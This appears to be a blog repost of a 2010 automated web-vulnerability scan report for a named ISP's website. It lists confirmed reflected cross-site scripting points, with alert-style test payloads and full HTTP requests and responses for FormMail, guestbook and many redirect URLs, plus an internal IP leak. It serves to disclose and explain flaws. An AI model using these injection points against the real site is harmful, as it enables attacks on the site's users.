XSS.CX Research Blog

The DORK Report




Netsparker, Web Application Security Scanner

NETSPARKER SCAN REPORT SUMMARY

TARGET URL: http://www.gis.net/
SCAN DATE: 9/24/2010 8:54:05 PM
REPORT DATE: 9/25/2010 7:17:34 AM
SCAN DURATION: 03:45:31.2656250
Total Requests: 89461
Average Speed: 6.61 req/sec.
Identified: 32
Confirmed: 8
Critical: 0
Informational: 9

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Proxy
Authentication
Scheduled

VULNERABILITIES

MEDIUM: 66 %
LOW: 6 %
INFORMATION: 28 %
Cross-site Scripting

21 TOTAL, MEDIUM, 6 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include the OWASP Reform and Microsoft Anti Cross-site Scripting libraries.


- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter Type Value
_from_address POST 3
_need POST '"--><script>alert(0x000DAE)</script>
_subject POST 3
_to_address POST username@gis.net
Comments POST 3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 131
Accept-Encoding: gzip, deflate

_from_address=3&_need='%22--%3e%3cscript%3enetsparker(0x000DAE)%3c%2fscript%3e&_subject=3&_to_address=username%40gis.net&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 01:58:28 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<html> <head> <title>Error: Blank Fields</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Blank Fields</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td>The following fields were left blank in your submission form:<p> <ul> <li>'"--><script>netsparker(0x000DAE)</script> </ul><br> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form and try again.<hr size=1> <center><font size=-1> <a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 &copy; 1995 - 1997 Matt Wright<br> A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a> </font></center> </td></tr> </table> </center> </body></html>
- /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E

/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E CONFIRMED

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C..

Parameters

Parameter Type Value
address POST 1
body POST 1
name POST 1
URI-BASED Raw URI '"--><script>alert(0x000E82)</script>

Request

POST /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Enetsparker(0x000E82)%3C/script%3E HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 24
Accept-Encoding: gzip, deflate

address=1&body=1&name=1&

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:02:55 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<HTML><HEAD><TITLE>Post Results</TITLE></HEAD><BODY>Can't open file /usr/local/etc/httpd/htdocs/~username/guestbook.html'"--><script>netsparker(0x000E82)</script>: No such file or directory</BODY></HTML>
- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter Type Value
_to_address POST '"--><script>alert(0x000EB5)</script>
_from_address POST 3
Name POST Ronald Smith
_subject POST 3
_need POST Name
Comments POST 3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 135
Accept-Encoding: gzip, deflate

_to_address='%22--%3e%3cscript%3enetsparker(0x000EB5)%3c%2fscript%3e&_from_address=3&Name=Ronald+Smith&_subject=3&_need=Name&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:04:20 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to '"--><script>netsparker(0x000EB5)</script> on Friday, September 24, 2010 at 22:04:22<p><hr size=1 width=75%><p><b>Name:</b> Ronald Smith<p><b>Comments:</b> 3<p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 &copy; 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users
- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter Type Value
_to_address POST username@gis.net
_from_address POST 3
Name POST '"--><script>alert(0x000EC1)</script>
_subject POST 3
_need POST Name
Comments POST 3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 141
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name='%22--%3e%3cscript%3enetsparker(0x000EC1)%3c%2fscript%3e&_subject=3&_need=Name&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:04:46 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to username@gis.net on Friday, September 24, 2010 at 22:04:47<p><hr size=1 width=75%><p><b>Name:</b> '"--><script>netsparker(0x000EC1)</script><p><b>Comments:</b> 3<p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 &copy; 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users
- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter Type Value
_to_address POST username@gis.net
_from_address POST 3
Name POST Ronald Smith
_subject POST 3
_need POST '"--><script>alert(0x000ECC)</script>
Comments POST 3

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 149
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name=Ronald+Smith&_subject=3&_need='%22--%3e%3cscript%3enetsparker(0x000ECC)%3c%2fscript%3e&Comments=3

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:05:10 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<html> <head> <title>Error: Blank Fields</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Blank Fields</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td>The following fields were left blank in your submission form:<p> <ul> <li>'"--><script>netsparker(0x000ECC)</script> </ul><br> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form and try again.<hr size=1> <center><font size=-1> <a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 &copy; 1995 - 1997 Matt Wright<br> A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a> </font></center> </td></tr> </table> </center> </body></html>
- /cgi-bin/formmail.cgi

/cgi-bin/formmail.cgi CONFIRMED

http://www.gis.net/cgi-bin/formmail.cgi

Parameters

Parameter Type Value
_to_address POST username@gis.net
_from_address POST 3
Name POST Ronald Smith
_subject POST 3
_need POST Name
Comments POST '"--><script>alert(0x000ECD)</script>

Request

POST /cgi-bin/formmail.cgi HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 152
Accept-Encoding: gzip, deflate

_to_address=username%40gis.net&_from_address=3&Name=Ronald+Smith&_subject=3&_need=Name&Comments='%22--%3e%3cscript%3enetsparker(0x000ECD)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 02:05:13 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html


<html> <head> <title>Thank You</title> </head> <body> <center> <h1>Thank You For Filling Out This Form</h1></center>Below is what you submitted to username@gis.net on Friday, September 24, 2010 at 22:05:14<p><hr size=1 width=75%><p><b>Name:</b> Ronald Smith<p><b>Comments:</b> '"--><script>netsparker(0x000ECD)</script><p><p><hr size=1 width=75%><p> <hr size=1 width=75%><p> <center><font size=-1><a href="http://www.worldwidemart.com/scripts/formmail.shtml">FormMail</a> V1.6 &copy; 1995 -1997 Matt Wright<br>A Free Product of <a href="http://www.worldwidemart.com/scripts/">Matt's Script Archive, Inc.</a></font></center> </body> </html>Failed to send message to any users
- /boston

/boston

http://www.gis.net/boston?/"ns="alert(0x00026E)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x00026E)

Request

GET /boston?/"ns="netsparker(0x00026E) HTTP/1.1
Referer: http://www.gis.net/wifi.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:43 GMT
Server: Apache
Location: http://www.gis.net/boston/?/"ns="netsparker(0x00026E)
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/boston/?/"ns="netsparker(0x00026E)">here</a>.</p></body></html>
- /support/windows/xp

/support/windows/xp

http://www.gis.net/support/windows/xp?/"ns="alert(0x0002EC)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x0002EC)

Request

GET /support/windows/xp?/"ns="netsparker(0x0002EC) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:51 GMT
Server: Apache
Location: http://www.gis.net/support/windows/xp/?/"ns="netsparker(0x0002EC)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/xp/?/"ns="netsparker(0x0002EC)">here</a>.</p></body></html>
- /support/windows/win2000

/support/windows/win2000

http://www.gis.net/support/windows/win2000?/"ns="alert(0x000300)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000300)

Request

GET /support/windows/win2000?/"ns="netsparker(0x000300) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:52 GMT
Server: Apache
Location: http://www.gis.net/support/windows/win2000/?/"ns="netsparker(0x000300)
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/win2000/?/"ns="netsparker(0x000300)">here</a>.</p></body></html>
- /support/windows/winme

/support/windows/winme

http://www.gis.net/support/windows/winme?/"ns="alert(0x00030E)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x00030E)

Request

GET /support/windows/winme?/"ns="netsparker(0x00030E) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:52 GMT
Server: Apache
Location: http://www.gis.net/support/windows/winme/?/"ns="netsparker(0x00030E)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/winme/?/"ns="netsparker(0x00030E)">here</a>.</p></body></html>
- /support/windows/winnt

/support/windows/winnt

http://www.gis.net/support/windows/winnt?/"ns="alert(0x000327)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000327)

Request

GET /support/windows/winnt?/"ns="netsparker(0x000327) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:53 GMT
Server: Apache
Location: http://www.gis.net/support/windows/winnt/?/"ns="netsparker(0x000327)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/winnt/?/"ns="netsparker(0x000327)">here</a>.</p></body></html>
- /support/windows/win98

/support/windows/win98

http://www.gis.net/support/windows/win98?/"ns="alert(0x000320)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000320)

Request

GET /support/windows/win98?/"ns="netsparker(0x000320) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:53 GMT
Server: Apache
Location: http://www.gis.net/support/windows/win98/?/"ns="netsparker(0x000320)
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/windows/win98/?/"ns="netsparker(0x000320)">here</a>.</p></body></html>
- /support/mac/osx

/support/mac/osx

http://www.gis.net/support/mac/osx?/"ns="alert(0x000336)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000336)

Request

GET /support/mac/osx?/"ns="netsparker(0x000336) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:54 GMT
Server: Apache
Location: http://www.gis.net/support/mac/osx/?/"ns="netsparker(0x000336)
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/mac/osx/?/"ns="netsparker(0x000336)">here</a>.</p></body></html>
- /support/mac/imac

/support/mac/imac

http://www.gis.net/support/mac/imac?/"ns="alert(0x000354)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000354)

Request

GET /support/mac/imac?/"ns="netsparker(0x000354) HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:28:56 GMT
Server: Apache
Location: http://www.gis.net/support/mac/imac/?/"ns="netsparker(0x000354)
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/mac/imac/?/"ns="netsparker(0x000354)">here</a>.</p></body></html>
- /support/dsl/win2k

/support/dsl/win2k

http://www.gis.net/support/dsl/win2k?/"ns="alert(0x0003ED)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x0003ED)

Request

GET /support/dsl/win2k?/"ns="netsparker(0x0003ED) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:03 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/win2k/?/"ns="netsparker(0x0003ED)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/win2k/?/"ns="netsparker(0x0003ED)">here</a>.</p></body></html>
- /support/dsl/win98

/support/dsl/win98

http://www.gis.net/support/dsl/win98?/"ns="alert(0x0003F4)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x0003F4)

Request

GET /support/dsl/win98?/"ns="netsparker(0x0003F4) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:04 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/win98/?/"ns="netsparker(0x0003F4)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/win98/?/"ns="netsparker(0x0003F4)">here</a>.</p></body></html>
- /support/dsl/nt

/support/dsl/nt

http://www.gis.net/support/dsl/nt?/"ns="alert(0x000401)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000401)

Request

GET /support/dsl/nt?/"ns="netsparker(0x000401) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:39 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/nt/?/"ns="netsparker(0x000401)
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/nt/?/"ns="netsparker(0x000401)">here</a>.</p></body></html>
- /support/dsl/mac

/support/dsl/mac

http://www.gis.net/support/dsl/mac?/"ns="alert(0x00041D)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x00041D)

Request

GET /support/dsl/mac?/"ns="netsparker(0x00041D) HTTP/1.1
Referer: http://www.gis.net/support/dsl.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:42 GMT
Server: Apache
Location: http://www.gis.net/support/dsl/mac/?/"ns="netsparker(0x00041D)
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/support/dsl/mac/?/"ns="netsparker(0x00041D)">here</a>.</p></body></html>
- /signup

/signup

http://www.gis.net/signup?/"ns="alert(0x0004BE)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x0004BE)

Request

GET /signup?/"ns="netsparker(0x0004BE) HTTP/1.1
Referer: http://www.gis.net/dialup/ga.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:47 GMT
Server: Apache
Location: http://www.gis.net/signup/?/"ns="netsparker(0x0004BE)
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/signup/?/"ns="netsparker(0x0004BE)">here</a>.</p></body></html>
- /softphone

/softphone

http://www.gis.net/softphone?/"ns="alert(0x000439)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x000439)

Request

GET /softphone?/"ns="netsparker(0x000439) HTTP/1.1
Referer: http://www.gis.net/support/phone.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:43 GMT
Server: Apache
Location: http://www.gis.net/softphone/?/"ns="netsparker(0x000439)
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/softphone/?/"ns="netsparker(0x000439)">here</a>.</p></body></html>
- /register

/register

http://www.gis.net/register?/"ns="alert(0x00048C)

Parameters

Parameter Type Value
Query Based QUERYSTRING /"ns="alert(0x00048C)

Request

GET /register?/"ns="netsparker(0x00048C) HTTP/1.1
Referer: http://www.gis.net/support/webhosting.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Sep 2010 01:29:45 GMT
Server: Apache
Location: http://www.gis.net/register/?/"ns="netsparker(0x00048C)
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gis.net/register/?/"ns="netsparker(0x00048C)">here</a>.</p></body></html>
Internal Server Error

1 TOTAL, LOW, 1 CONFIRMED
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection, or could be the result of poor coding practices.

Remedy

Analyse this issue and review the application code so that it handles unexpected errors; this should be a generic practice that does not disclose further information upon an error. All errors should be handled server side only.
- /~sotis/cgi-bin/crazywwwboard.cgi

/~sotis/cgi-bin/crazywwwboard.cgi CONFIRMED

http://www.gis.net/~sotis/cgi-bin/crazywwwboard.cgi

Request

GET /~sotis/cgi-bin/crazywwwboard.cgi HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 25 Sep 2010 00:54:58 GMT
Server: Apache
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@gis.net and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
[Possible] Internal IP Address Leakage

1 TOTAL, LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is, then consider removing it.
- /support/dsl/win2k/

/support/dsl/win2k/

http://www.gis.net/support/dsl/win2k/

Extracted IP Address(es)

  • 192.168.100.2
  • 192.168.100.1

Request

GET /support/dsl/win2k/ HTTP/1.1
Referer: http://www.gis.net/support/dsl/win2k
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4203
Content-Type: text/html


<html><body><h3>Setting up your Windows 2000</h3>First Make sure that all computers have an Ethernet card installed, as well as being properly connected to the router or hub (hubs are onlyneeded if you have more that 4 workstations that need to be hooked up tothe connection) with a RJ-45 Ethernet Cable. Both are available at anycomputer or technology store.<p>Below is a list of IP’s that Galaxy has allocated for the workstations onyour LAN. (Local Area Network.) We will inform you the IP of the routeritself; then you need to assign the addresses, one for each PC in your LAN.We will also provide you with a Subnet mask value for your network.(Usually 255.255.255.248)<p>You’ll also choose a unique hostname for each PC. You will set a domainname for your LAN, which can be an “officially” registered name likeYahoo.com or just a local name that you’ve picked like “mycompany.”<p>All the information you will need to set up your GalaxyDSL account.<p>Account Name: [Account Name]<p>IP Addresses: 192.168.100.2 through .255<p>Subnet Mask: 